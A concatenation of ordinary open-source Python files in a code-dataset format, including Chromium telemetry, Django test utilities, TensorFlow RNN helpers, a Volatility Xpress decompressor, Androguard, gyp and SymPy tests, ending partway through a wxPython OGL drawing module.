result = PrintDeps(search_paths, ExpandDirectories(options.deps or []), out)
if not result:
logging.error('Could not find Closure Library in the specified paths')
sys.exit(1)
return
inputs = GetInputsFromOptions(options)
logging.info('Finding Closure dependencies...')
deps = CalculateDependencies(search_paths, inputs)
output_mode = options.output_mode
if output_mode == 'script':
PrintScript(deps, out)
elif output_mode == 'list':
# Just print out a dep per line
for dep in deps:
PrintLine(dep, out)
elif output_mode == 'compiled':
# Make sure a .jar is specified.
if not options.compiler_jar:
logging.error('--compiler_jar flag must be specified if --output is '
'"compiled"')
sys.exit(1)
# User friendly version check.
if distutils and not (distutils.version.LooseVersion(GetJavaVersion()) >
distutils.version.LooseVersion('1.6')):
logging.error('Closure Compiler requires Java 1.6 or higher.')
logging.error('Please visit http://www.java.com/getjava')
sys.exit(1)
Compile(options.compiler_jar, deps, out, options.compiler_flags)
else:
logging.error('Invalid value for --output flag.')
sys.exit(1)
if __name__ == '__main__':
main()
| bsd-3-clause |
hujiajie/chromium-crosswalk | tools/perf/page_sets/alexa1-10000.py | 35 | 1340 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import os
from telemetry.page import page as page_module
from telemetry.page import shared_page_state
from telemetry import story
__location__ = os.path.realpath(
os.path.join(os.getcwd(), os.path.dirname(__file__)))
# Generated on 2013-09-03 13:59:53.459117 by rmistry using
# create_page_set.py.
_TOP_10000_ALEXA_FILE = os.path.join(__location__, 'alexa1-10000-urls.json')
class Alexa1To10000Page(page_module.Page):
def __init__(self, url, page_set):
super(Alexa1To10000Page, self).__init__(
url=url, page_set=page_set,
shared_page_state_class=shared_page_state.SharedDesktopPageState)
def RunPageInteractions(self, action_runner):
with action_runner.CreateGestureInteraction('ScrollAction'):
action_runner.ScrollPage()
class Alexa1To10000PageSet(story.StorySet):
""" Top 1-10000 Alexa global.
Generated on 2013-09-03 13:59:53.459117 by rmistry using
create_page_set.py.
"""
def __init__(self):
super(Alexa1To10000PageSet, self).__init__()
with open(_TOP_10000_ALEXA_FILE) as f:
urls_list = json.load(f)
for url in urls_list:
self.AddStory(Alexa1To10000Page(url, self))
| bsd-3-clause |
thomasgilgenast/gilgistatus-nonrel | django/test/utils.py | 185 | 3644 | import sys
import time
import os
import warnings
from django.conf import settings
from django.core import mail
from django.core.mail.backends import locmem
from django.test import signals
from django.template import Template
from django.utils.translation import deactivate
__all__ = ('Approximate', 'ContextList', 'setup_test_environment',
'teardown_test_environment', 'get_runner')
class Approximate(object):
def __init__(self, val, places=7):
self.val = val
self.places = places
def __repr__(self):
return repr(self.val)
def __eq__(self, other):
if self.val == other:
return True
return round(abs(self.val-other), self.places) == 0
class ContextList(list):
"""A wrapper that provides direct key access to context items contained
in a list of context objects.
"""
def __getitem__(self, key):
if isinstance(key, basestring):
for subcontext in self:
if key in subcontext:
return subcontext[key]
raise KeyError(key)
else:
return super(ContextList, self).__getitem__(key)
def __contains__(self, key):
try:
value = self[key]
except KeyError:
return False
return True
def instrumented_test_render(self, context):
"""
An instrumented Template render method, providing a signal
that can be intercepted by the test system Client
"""
signals.template_rendered.send(sender=self, template=self, context=context)
return self.nodelist.render(context)
def setup_test_environment():
"""Perform any global pre-test setup. This involves:
- Installing the instrumented test renderer
- Set the email backend to the locmem email backend.
- Setting the active locale to match the LANGUAGE_CODE setting.
"""
Template.original_render = Template._render
Template._render = instrumented_test_render
mail.original_SMTPConnection = mail.SMTPConnection
mail.SMTPConnection = locmem.EmailBackend
mail.original_email_backend = settings.EMAIL_BACKEND
settings.EMAIL_BACKEND = 'django.core.mail.backends.locmem.EmailBackend'
mail.outbox = []
deactivate()
def teardown_test_environment():
"""Perform any global post-test teardown. This involves:
- Restoring the original test renderer
- Restoring the email sending functions
"""
Template._render = Template.original_render
del Template.original_render
mail.SMTPConnection = mail.original_SMTPConnection
del mail.original_SMTPConnection
settings.EMAIL_BACKEND = mail.original_email_backend
del mail.original_email_backend
del mail.outbox
def get_warnings_state():
"""
Returns an object containing the state of the warnings module
"""
# There is no public interface for doing this, but this implementation of
# get_warnings_state and restore_warnings_state appears to work on Python
# 2.4 to 2.7.
return warnings.filters[:]
def restore_warnings_state(state):
"""
Restores the state of the warnings module when passed an object that was
returned by get_warnings_state()
"""
warnings.filters = state[:]
def get_runner(settings):
test_path = settings.TEST_RUNNER.split('.')
# Allow for Python 2.5 relative paths
if len(test_path) > 1:
test_module_name = '.'.join(test_path[:-1])
else:
test_module_name = '.'
test_module = __import__(test_module_name, {}, {}, test_path[-1])
test_runner = getattr(test_module, test_path[-1])
return test_runner
| bsd-3-clause |
ryfeus/lambda-packs | Keras_tensorflow_nightly/source2.7/tensorflow/contrib/learn/python/learn/estimators/rnn_common.py | 42 | 12923 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Common operations for RNN Estimators (deprecated).
This module and all its submodules are deprecated. See
[contrib/learn/README.md](https://www.tensorflow.org/code/tensorflow/contrib/learn/README.md)
for migration instructions.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib import metrics
from tensorflow.contrib import rnn as contrib_rnn
from tensorflow.contrib.learn.python.learn.estimators import constants
from tensorflow.contrib.learn.python.learn.estimators import prediction_key
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
# NOTE(jtbates): As of February 10, 2017, some of the `RNNKeys` have been
# removed and replaced with values from `prediction_key.PredictionKey`. The key
# `RNNKeys.PREDICTIONS_KEY` has been replaced by
# `prediction_key.PredictionKey.SCORES` for regression and
# `prediction_key.PredictionKey.CLASSES` for classification. The key
# `RNNKeys.PROBABILITIES_KEY` has been replaced by
# `prediction_key.PredictionKey.PROBABILITIES`.
class RNNKeys(object):
FINAL_STATE_KEY = 'final_state'
LABELS_KEY = '__labels__'
SEQUENCE_LENGTH_KEY = 'sequence_length'
STATE_PREFIX = 'rnn_cell_state'
class PredictionType(object):
"""Enum-like values for the type of prediction that the model makes.
"""
SINGLE_VALUE = 1
MULTIPLE_VALUE = 2
_CELL_TYPES = {'basic_rnn': contrib_rnn.BasicRNNCell,
'lstm': contrib_rnn.LSTMCell,
'gru': contrib_rnn.GRUCell,}
def _get_single_cell(cell_type, num_units):
"""Constructs and return a single `RNNCell`.
Args:
cell_type: Either a string identifying the `RNNCell` type or a subclass of
`RNNCell`.
num_units: The number of units in the `RNNCell`.
Returns:
An initialized `RNNCell`.
Raises:
ValueError: `cell_type` is an invalid `RNNCell` name.
TypeError: `cell_type` is not a string or a subclass of `RNNCell`.
"""
cell_type = _CELL_TYPES.get(cell_type, cell_type)
if not cell_type or not issubclass(cell_type, contrib_rnn.RNNCell):
raise ValueError('The supported cell types are {}; got {}'.format(
list(_CELL_TYPES.keys()), cell_type))
return cell_type(num_units=num_units)
def construct_rnn_cell(num_units, cell_type='basic_rnn',
dropout_keep_probabilities=None):
"""Constructs cells, applies dropout and assembles a `MultiRNNCell`.
The cell type chosen by DynamicRNNEstimator.__init__() is the same as
returned by this function when called with the same arguments.
Args:
num_units: A single `int` or a list/tuple of `int`s. The size of the
`RNNCell`s.
cell_type: A string identifying the `RNNCell` type or a subclass of
`RNNCell`.
dropout_keep_probabilities: a list of dropout probabilities or `None`. If a
list is given, it must have length `len(cell_type) + 1`.
Returns:
An initialized `RNNCell`.
"""
if not isinstance(num_units, (list, tuple)):
num_units = (num_units,)
cells = [_get_single_cell(cell_type, n) for n in num_units]
if dropout_keep_probabilities:
cells = apply_dropout(cells, dropout_keep_probabilities)
if len(cells) == 1:
return cells[0]
return contrib_rnn.MultiRNNCell(cells)
def apply_dropout(cells, dropout_keep_probabilities, random_seed=None):
"""Applies dropout to the outputs and inputs of `cell`.
Args:
cells: A list of `RNNCell`s.
dropout_keep_probabilities: a list whose elements are either floats in
`[0.0, 1.0]` or `None`. It must have length one greater than `cells`.
random_seed: Seed for random dropout.
Returns:
A list of `RNNCell`s, the result of applying the supplied dropouts.
Raises:
ValueError: If `len(dropout_keep_probabilities) != len(cells) + 1`.
"""
if len(dropout_keep_probabilities) != len(cells) + 1:
raise ValueError(
'The number of dropout probabilities must be one greater than the '
'number of cells. Got {} cells and {} dropout probabilities.'.format(
len(cells), len(dropout_keep_probabilities)))
wrapped_cells = [
contrib_rnn.DropoutWrapper(cell, prob, 1.0, seed=random_seed)
for cell, prob in zip(cells[:-1], dropout_keep_probabilities[:-2])
]
wrapped_cells.append(
contrib_rnn.DropoutWrapper(cells[-1], dropout_keep_probabilities[-2],
dropout_keep_probabilities[-1]))
return wrapped_cells
def get_eval_metric_ops(problem_type, prediction_type, sequence_length,
prediction_dict, labels):
"""Returns eval metric ops for given `problem_type` and `prediction_type`.
Args:
problem_type: `ProblemType.CLASSIFICATION` or
`ProblemType.LINEAR_REGRESSION`.
prediction_type: `PredictionType.SINGLE_VALUE` or
`PredictionType.MULTIPLE_VALUE`.
sequence_length: A `Tensor` with shape `[batch_size]` and dtype `int32`
containing the length of each sequence in the batch. If `None`, sequences
are assumed to be unpadded.
prediction_dict: A dict of prediction tensors.
labels: The label `Tensor`.
Returns:
A `dict` mapping strings to the result of calling the metric_fn.
"""
eval_metric_ops = {}
if problem_type == constants.ProblemType.CLASSIFICATION:
# Multi value classification
if prediction_type == PredictionType.MULTIPLE_VALUE:
mask_predictions, mask_labels = mask_activations_and_labels(
prediction_dict[prediction_key.PredictionKey.CLASSES], labels,
sequence_length)
eval_metric_ops['accuracy'] = metrics.streaming_accuracy(
predictions=mask_predictions, labels=mask_labels)
# Single value classification
elif prediction_type == PredictionType.SINGLE_VALUE:
eval_metric_ops['accuracy'] = metrics.streaming_accuracy(
predictions=prediction_dict[prediction_key.PredictionKey.CLASSES],
labels=labels)
elif problem_type == constants.ProblemType.LINEAR_REGRESSION:
# Multi value regression
if prediction_type == PredictionType.MULTIPLE_VALUE:
pass
# Single value regression
elif prediction_type == PredictionType.SINGLE_VALUE:
pass
return eval_metric_ops
def select_last_activations(activations, sequence_lengths):
"""Selects the nth set of activations for each n in `sequence_length`.
Returns a `Tensor` of shape `[batch_size, k]`. If `sequence_length` is not
`None`, then `output[i, :] = activations[i, sequence_length[i] - 1, :]`. If
`sequence_length` is `None`, then `output[i, :] = activations[i, -1, :]`.
Args:
activations: A `Tensor` with shape `[batch_size, padded_length, k]`.
sequence_lengths: A `Tensor` with shape `[batch_size]` or `None`.
Returns:
A `Tensor` of shape `[batch_size, k]`.
"""
with ops.name_scope(
'select_last_activations', values=[activations, sequence_lengths]):
activations_shape = array_ops.shape(activations)
batch_size = activations_shape[0]
padded_length = activations_shape[1]
num_label_columns = activations_shape[2]
if sequence_lengths is None:
sequence_lengths = padded_length
reshaped_activations = array_ops.reshape(activations,
[-1, num_label_columns])
indices = math_ops.range(batch_size) * padded_length + sequence_lengths - 1
last_activations = array_ops.gather(reshaped_activations, indices)
last_activations.set_shape(
[activations.get_shape()[0], activations.get_shape()[2]])
return last_activations
def mask_activations_and_labels(activations, labels, sequence_lengths):
"""Remove entries outside `sequence_lengths` and returned flattened results.
Args:
activations: Output of the RNN, shape `[batch_size, padded_length, k]`.
labels: Label values, shape `[batch_size, padded_length]`.
sequence_lengths: A `Tensor` of shape `[batch_size]` with the unpadded
length of each sequence. If `None`, then each sequence is unpadded.
Returns:
activations_masked: `logit` values with those beyond `sequence_lengths`
removed for each batch. Batches are then concatenated. Shape
`[tf.sum(sequence_lengths), k]` if `sequence_lengths` is not `None` and
shape `[batch_size * padded_length, k]` otherwise.
labels_masked: Label values after removing unneeded entries. Shape
`[tf.sum(sequence_lengths)]` if `sequence_lengths` is not `None` and shape
`[batch_size * padded_length]` otherwise.
"""
with ops.name_scope(
'mask_activations_and_labels',
values=[activations, labels, sequence_lengths]):
labels_shape = array_ops.shape(labels)
batch_size = labels_shape[0]
padded_length = labels_shape[1]
if sequence_lengths is None:
flattened_dimension = padded_length * batch_size
activations_masked = array_ops.reshape(activations,
[flattened_dimension, -1])
labels_masked = array_ops.reshape(labels, [flattened_dimension])
else:
mask = array_ops.sequence_mask(sequence_lengths, padded_length)
activations_masked = array_ops.boolean_mask(activations, mask)
labels_masked = array_ops.boolean_mask(labels, mask)
return activations_masked, labels_masked
def multi_value_predictions(activations, target_column, problem_type,
predict_probabilities):
"""Maps `activations` from the RNN to predictions for multi value models.
If `predict_probabilities` is `False`, this function returns a `dict`
containing single entry with key `prediction_key.PredictionKey.CLASSES` for
`problem_type` `ProblemType.CLASSIFICATION` or
`prediction_key.PredictionKey.SCORE` for `problem_type`
`ProblemType.LINEAR_REGRESSION`.
If `predict_probabilities` is `True`, it will contain a second entry with key
`prediction_key.PredictionKey.PROBABILITIES`. The
value of this entry is a `Tensor` of probabilities with shape
`[batch_size, padded_length, num_classes]`.
Note that variable length inputs will yield some predictions that don't have
meaning. For example, if `sequence_length = [3, 2]`, then prediction `[1, 2]`
has no meaningful interpretation.
Args:
activations: Output from an RNN. Should have dtype `float32` and shape
`[batch_size, padded_length, ?]`.
target_column: An initialized `TargetColumn`, calculate predictions.
problem_type: Either `ProblemType.CLASSIFICATION` or
`ProblemType.LINEAR_REGRESSION`.
predict_probabilities: A Python boolean, indicating whether probabilities
should be returned. Should only be set to `True` for
classification/logistic regression problems.
Returns:
A `dict` mapping strings to `Tensors`.
"""
with ops.name_scope('MultiValuePrediction'):
activations_shape = array_ops.shape(activations)
flattened_activations = array_ops.reshape(activations,
[-1, activations_shape[2]])
prediction_dict = {}
if predict_probabilities:
flat_probabilities = target_column.logits_to_predictions(
flattened_activations, proba=True)
flat_predictions = math_ops.argmax(flat_probabilities, 1)
if target_column.num_label_columns == 1:
probability_shape = array_ops.concat([activations_shape[:2], [2]], 0)
else:
probability_shape = activations_shape
probabilities = array_ops.reshape(
flat_probabilities,
probability_shape,
name=prediction_key.PredictionKey.PROBABILITIES)
prediction_dict[
prediction_key.PredictionKey.PROBABILITIES] = probabilities
else:
flat_predictions = target_column.logits_to_predictions(
flattened_activations, proba=False)
predictions_name = (prediction_key.PredictionKey.CLASSES
if problem_type == constants.ProblemType.CLASSIFICATION
else prediction_key.PredictionKey.SCORES)
predictions = array_ops.reshape(
flat_predictions, [activations_shape[0], activations_shape[1]],
name=predictions_name)
prediction_dict[predictions_name] = predictions
return prediction_dict
| mit |
Stan1989/volatility | volatility/win32/xpress.py | 58 | 5368 | # Volatility
# Copyright (c) 2008-2013 Volatility Foundation
# Copyright (c) 2008 Brendan Dolan-Gavitt <bdolangavitt@wesleyan.edu>
#
# This file is part of Volatility.
#
# Volatility is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Volatility is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Volatility. If not, see <http://www.gnu.org/licenses/>.
#
# The source code in this file was inspired by the work of Matthieu Suiche,
# http://sandman.msuiche.net/, and the information presented released as
# part of the Microsoft Interoperability Initiative:
# http://download.microsoft.com/download/a/e/6/ae6e4142-aa58-45c6-8dcf-a657e5900cd3/%5BMS-DRSR%5D.pdf
# A special thanks to Matthieu for all his help!
"""
@author: Brendan Dolan-Gavitt
@license: GNU General Public License 2.0
@contact: bdolangavitt@wesleyan.edu
"""
#pylint: disable-msg=C0111
from struct import unpack
from struct import error as StructError
def recombine(outbuf):
return "".join(outbuf[k] for k in sorted(outbuf.keys()))
def xpress_decode(inputBuffer):
outputBuffer = {}
outputIndex = 0
inputIndex = 0
indicatorBit = 0
nibbleIndex = 0
# we are decoding the entire input here, so I have changed
# the check to see if we're at the end of the output buffer
# with a check to see if we still have any input left.
while inputIndex < len(inputBuffer):
if (indicatorBit == 0):
# in pseudocode this was indicatorBit = ..., but that makes no
# sense, so I think this was intended...
try:
indicator = unpack("<L", inputBuffer[inputIndex:inputIndex + 4])[0]
except StructError:
return recombine(outputBuffer)
inputIndex += 4
indicatorBit = 32
indicatorBit = indicatorBit - 1
# check whether the bit specified by indicatorBit is set or not
# set in indicator. For example, if indicatorBit has value 4
# check whether the 4th bit of the value in indicator is set
if not (indicator & (1 << indicatorBit)):
try:
outputBuffer[outputIndex] = inputBuffer[inputIndex]
except IndexError:
return recombine(outputBuffer)
inputIndex += 1
outputIndex += 1
else:
# Get the length. This appears to use a scheme whereby if
# the value at the current width is all ones, then we assume
# that it is actually wider. First we try 3 bits, then 3
# bits plus a nibble, then a byte, and finally two bytes (an
# unsigned short). Also, if we are using a nibble, then every
# other time we get the nibble from the high part of the previous
# byte used as a length nibble.
# Thus if a nibble byte is F2, we would first use the low part (2),
# and then at some later point get the nibble from the high part (F).
try:
length = unpack("<H", inputBuffer[inputIndex:inputIndex + 2])[0]
except StructError:
return recombine(outputBuffer)
inputIndex += 2
offset = length / 8
length = length % 8
if length == 7:
if nibbleIndex == 0:
nibbleIndex = inputIndex
length = ord(inputBuffer[inputIndex]) % 16
inputIndex += 1
else:
# get the high nibble of the last place a nibble sized
# length was used thus we don't waste that extra half
# byte :p
length = ord(inputBuffer[nibbleIndex]) / 16
nibbleIndex = 0
if length == 15:
length = ord(inputBuffer[inputIndex])
inputIndex += 1
if length == 255:
try:
length = unpack("<H", inputBuffer[inputIndex:inputIndex + 2])[0]
except StructError:
return recombine(outputBuffer)
inputIndex = inputIndex + 2
length = length - (15 + 7)
length = length + 15
length = length + 7
length = length + 3
while length != 0:
try:
outputBuffer[outputIndex] = outputBuffer[outputIndex - offset - 1]
except KeyError:
return recombine(outputBuffer)
outputIndex += 1
length -= 1
return recombine(outputBuffer)
try:
import pyxpress #pylint: disable-msg=F0401
xpress_decode = pyxpress.decode
except ImportError:
pass
if __name__ == "__main__":
import sys
dec_data = xpress_decode(open(sys.argv[1]).read())
sys.stdout.write(dec_data)
| gpl-2.0 |
draekko/androguard | androaxml.py | 23 | 2444 | #!/usr/bin/env python
# This file is part of Androguard.
#
# Copyright (C) 2012, Anthony Desnos <desnos at t0t0.fr>
# All rights reserved.
#
# Androguard is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Androguard is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Androguard. If not, see <http://www.gnu.org/licenses/>.
import sys
from optparse import OptionParser
from xml.dom import minidom
import codecs
from androguard.core import androconf
from androguard.core.bytecodes import apk
from androguard.util import read
option_0 = { 'name' : ('-i', '--input'), 'help' : 'filename input (APK or android\'s binary xml)', 'nargs' : 1 }
option_1 = { 'name' : ('-o', '--output'), 'help' : 'filename output of the xml', 'nargs' : 1 }
option_2 = { 'name' : ('-v', '--version'), 'help' : 'version of the API', 'action' : 'count' }
options = [option_0, option_1, option_2]
def main(options, arguments):
if options.input != None:
buff = ""
ret_type = androconf.is_android(options.input)
if ret_type == "APK":
a = apk.APK(options.input)
buff = a.get_android_manifest_xml().toprettyxml(encoding="utf-8")
elif ".xml" in options.input:
ap = apk.AXMLPrinter(read(options.input))
buff = minidom.parseString(ap.get_buff()).toprettyxml(encoding="utf-8")
else:
print "Unknown file type"
return
if options.output != None:
fd = codecs.open(options.output, "w", "utf-8")
fd.write( buff )
fd.close()
else:
print buff
elif options.version != None:
print "Androaxml version %s" % androconf.ANDROGUARD_VERSION
if __name__ == "__main__":
parser = OptionParser()
for option in options:
param = option['name']
del option['name']
parser.add_option(*param, **option)
options, arguments = parser.parse_args()
sys.argv[:] = arguments
main(options, arguments)
| apache-2.0 |
sanyaade-teachings/gyp | test/make_global_settings/ar/gyptest-make_global_settings_ar.py | 67 | 3740 | #!/usr/bin/env python
# Copyright (c) 2014 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies 'AR' in make_global_settings.
"""
import os
import sys
import TestGyp
def resolve_path(test, path):
if path is None:
return None
elif test.format == 'make':
return '$(abspath %s)' % path
elif test.format in ['ninja', 'xcode-ninja']:
return os.path.join('..', '..', path)
else:
test.fail_test()
def verify_ar_target(test, ar=None, rel_path=False):
if rel_path:
ar_expected = resolve_path(test, ar)
else:
ar_expected = ar
# Resolve default values
if ar_expected is None:
if test.format == 'make':
# Make generator hasn't set the default value for AR.
# You can remove the following assertion as long as it doesn't
# break existing projects.
test.must_not_contain('Makefile', 'AR ?= ')
return
elif test.format in ['ninja', 'xcode-ninja']:
if sys.platform == 'win32':
ar_expected = 'lib.exe'
else:
ar_expected = 'ar'
if test.format == 'make':
test.must_contain('Makefile', 'AR ?= %s' % ar_expected)
elif test.format in ['ninja', 'xcode-ninja']:
test.must_contain('out/Default/build.ninja', 'ar = %s' % ar_expected)
else:
test.fail_test()
def verify_ar_host(test, ar=None, rel_path=False):
if rel_path:
ar_expected = resolve_path(test, ar)
else:
ar_expected = ar
# Resolve default values
if ar_expected is None:
ar_expected = 'ar'
if test.format == 'make':
test.must_contain('Makefile', 'AR.host ?= %s' % ar_expected)
elif test.format in ['ninja', 'xcode-ninja']:
test.must_contain('out/Default/build.ninja', 'ar_host = %s' % ar_expected)
else:
test.fail_test()
test_format = ['ninja']
if sys.platform in ('linux2', 'darwin'):
test_format += ['make']
test = TestGyp.TestGyp(formats=test_format)
# Check default values
test.run_gyp('make_global_settings_ar.gyp')
verify_ar_target(test)
# Check default values with GYP_CROSSCOMPILE enabled.
with TestGyp.LocalEnv({'GYP_CROSSCOMPILE': '1'}):
test.run_gyp('make_global_settings_ar.gyp')
verify_ar_target(test)
verify_ar_host(test)
# Test 'AR' in 'make_global_settings'.
with TestGyp.LocalEnv({'GYP_CROSSCOMPILE': '1'}):
test.run_gyp('make_global_settings_ar.gyp', '-Dcustom_ar_target=my_ar')
verify_ar_target(test, ar='my_ar', rel_path=True)
# Test 'AR'/'AR.host' in 'make_global_settings'.
with TestGyp.LocalEnv({'GYP_CROSSCOMPILE': '1'}):
test.run_gyp('make_global_settings_ar.gyp',
'-Dcustom_ar_target=my_ar_target1',
'-Dcustom_ar_host=my_ar_host1')
verify_ar_target(test, ar='my_ar_target1', rel_path=True)
verify_ar_host(test, ar='my_ar_host1', rel_path=True)
# Test $AR and $AR_host environment variables.
with TestGyp.LocalEnv({'AR': 'my_ar_target2',
'AR_host': 'my_ar_host2'}):
test.run_gyp('make_global_settings_ar.gyp')
# Ninja generator resolves $AR in gyp phase. Make generator doesn't.
if test.format == 'ninja':
if sys.platform == 'win32':
# TODO(yukawa): Make sure if this is an expected result or not.
verify_ar_target(test, ar='lib.exe', rel_path=False)
else:
verify_ar_target(test, ar='my_ar_target2', rel_path=False)
verify_ar_host(test, ar='my_ar_host2', rel_path=False)
# Test 'AR' in 'make_global_settings' with $AR_host environment variable.
with TestGyp.LocalEnv({'AR_host': 'my_ar_host3'}):
test.run_gyp('make_global_settings_ar.gyp',
'-Dcustom_ar_target=my_ar_target3')
verify_ar_target(test, ar='my_ar_target3', rel_path=True)
verify_ar_host(test, ar='my_ar_host3', rel_path=False)
test.pass_test()
| bsd-3-clause |
Vishluck/sympy | sympy/parsing/tests/test_maxima.py | 123 | 1647 | from sympy.parsing.maxima import parse_maxima
from sympy import Rational, Abs, Symbol, sin, cos, E, oo, log, factorial
from sympy.abc import x
n = Symbol('n', integer=True)
def test_parser():
assert Abs(parse_maxima('float(1/3)') - 0.333333333) < 10**(-5)
assert parse_maxima('13^26') == 91733330193268616658399616009
assert parse_maxima('sin(%pi/2) + cos(%pi/3)') == Rational(3, 2)
assert parse_maxima('log(%e)') == 1
def test_injection():
parse_maxima('c: x+1', globals=globals())
assert c == x + 1
parse_maxima('g: sqrt(81)', globals=globals())
assert g == 9
def test_maxima_functions():
assert parse_maxima('expand( (x+1)^2)') == x**2 + 2*x + 1
assert parse_maxima('factor( x**2 + 2*x + 1)') == (x + 1)**2
assert parse_maxima('2*cos(x)^2 + sin(x)^2') == 2*cos(x)**2 + sin(x)**2
assert parse_maxima('trigexpand(sin(2*x)+cos(2*x))') == \
-1 + 2*cos(x)**2 + 2*cos(x)*sin(x)
assert parse_maxima('solve(x^2-4,x)') == [-2, 2]
assert parse_maxima('limit((1+1/x)^x,x,inf)') == E
assert parse_maxima('limit(sqrt(-x)/x,x,0,minus)') == -oo
assert parse_maxima('diff(x^x, x)') == x**x*(1 + log(x))
assert parse_maxima('sum(k, k, 1, n)', name_dict=dict(
n=Symbol('n', integer=True),
k=Symbol('k', integer=True)
)) == (n**2 + n)/2
assert parse_maxima('product(k, k, 1, n)', name_dict=dict(
n=Symbol('n', integer=True),
k=Symbol('k', integer=True)
)) == factorial(n)
assert parse_maxima('ratsimp((x^2-1)/(x+1))') == x - 1
assert Abs( parse_maxima(
'float(sec(%pi/3) + csc(%pi/3))') - 3.154700538379252) < 10**(-5)
| bsd-3-clause |
tinkerinestudio/Tinkerine-Suite | TinkerineSuite/python/Lib/site-packages/wx-2.8-msw-unicode/wx/lib/ogl/_drawn.py | 6 | 31963 | # -*- coding: iso-8859-1 -*-
#----------------------------------------------------------------------------
# Name: drawn.py
# Purpose: DrawnShape class
#
# Author: Pierre Hjälm (from C++ original by Julian Smart)
#
# Created: 2004-08-25
# RCS-ID: $Id: _drawn.py 37267 2006-02-03 06:51:34Z RD $
# Copyright: (c) 2004 Pierre Hjälm - 1998 Julian Smart
# License: wxWindows license
#----------------------------------------------------------------------------
import os.path
from _basic import RectangleShape
from _oglmisc import *
METAFLAGS_OUTLINE = 1
METAFLAGS_ATTACHMENTS = 2
DRAWN_ANGLE_0 = 0
DRAWN_ANGLE_90 = 1
DRAWN_ANGLE_180 = 2
DRAWN_ANGLE_270 = 3
# Drawing operations
DRAWOP_SET_PEN = 1
DRAWOP_SET_BRUSH = 2
DRAWOP_SET_FONT = 3
DRAWOP_SET_TEXT_COLOUR = 4
DRAWOP_SET_BK_COLOUR = 5
DRAWOP_SET_BK_MODE = 6
DRAWOP_SET_CLIPPING_RECT = 7
DRAWOP_DESTROY_CLIPPING_RECT = 8
DRAWOP_DRAW_LINE = 20
DRAWOP_DRAW_POLYLINE = 21
DRAWOP_DRAW_POLYGON = 22
DRAWOP_DRAW_RECT = 23
DRAWOP_DRAW_ROUNDED_RECT = 24
DRAWOP_DRAW_ELLIPSE = 25
DRAWOP_DRAW_POINT = 26
DRAWOP_DRAW_ARC = 27
DRAWOP_DRAW_TEXT = 28
DRAWOP_DRAW_SPLINE = 29
DRAWOP_DRAW_ELLIPTIC_ARC = 30
class DrawOp(object):
def __init__(self, theOp):
self._op = theOp
def GetOp(self):
return self._op
def GetPerimeterPoint(self, x1, y1, x2, y2, xOffset, yOffset, attachmentMode):
return False
def Scale(self,scaleX, scaleY):
pass
def Translate(self, x, y):
pass
def Rotate(self, x, y, theta, sinTheta, cosTheta):
pass
class OpSetGDI(DrawOp):
"""Set font, brush, text colour."""
def __init__(self, theOp, theImage, theGdiIndex, theMode = 0):
DrawOp.__init__(self, theOp)
self._gdiIndex = theGdiIndex
self._image = theImage
self._mode = theMode
def Do(self, dc, xoffset = 0, yoffset = 0):
if self._op == DRAWOP_SET_PEN:
# Check for overriding this operation for outline colour
if self._gdiIndex in self._image._outlineColours:
if self._image._outlinePen:
dc.SetPen(self._image._outlinePen)
else:
try:
dc.SetPen(self._image._gdiObjects[self._gdiIndex])
except IndexError:
pass
elif self._op == DRAWOP_SET_BRUSH:
# Check for overriding this operation for outline or fill colour
if self._gdiIndex in self._image._outlineColours:
# Need to construct a brush to match the outline pen's colour
if self._image._outlinePen:
br = wx.Brush(self._image._outlinePen, wx.SOLID)
if br:
dc.SetBrush(br)
elif self._gdiIndex in self._image._fillColours:
if self._image._fillBrush:
dc.SetBrush(self._image._fillBrush)
else:
brush = self._image._gdiObjects[self._gdiIndex]
if brush:
dc.SetBrush(brush)
elif self._op == DRAWOP_SET_FONT:
try:
dc.SetFont(self._image._gdiObjects[self._gdiIndex])
except IndexError:
pass
elif self._op == DRAWOP_SET_TEXT_COLOUR:
dc.SetTextForeground(wx.Colour(self._r, self._g, self._b))
elif self._op == DRAWOP_SET_BK_COLOUR:
dc.SetTextBackground(wx.Colour(self._r, self._g, self._b))
elif self._op == DRAWOP_SET_BK_MODE:
dc.SetBackgroundMode(self._mode)
class OpSetClipping(DrawOp):
"""Set/destroy clipping."""
def __init__(self, theOp, theX1, theY1, theX2, theY2):
DrawOp.__init__(self, theOp)
self._x1 = theX1
self._y1 = theY1
self._x2 = theX2
self._y2 = theY2
def Do(self, dc, xoffset, yoffset):
if self._op == DRAWOP_SET_CLIPPING_RECT:
dc.SetClippingRegion(self._x1 + xoffset, self._y1 + yoffset, self._x2 + xoffset, self._y2 + yoffset)
elif self._op == DRAWOP_DESTROY_CLIPPING_RECT:
dc.DestroyClippingRegion()
def Scale(self, scaleX, scaleY):
self._x1 *= scaleX
self._y1 *= scaleY
self._x2 *= scaleX
self._y2 *= scaleY
def Translate(self, x, y):
self._x1 += x
self._y1 += y
class OpDraw(DrawOp):
"""Draw line, rectangle, rounded rectangle, ellipse, point, arc, text."""
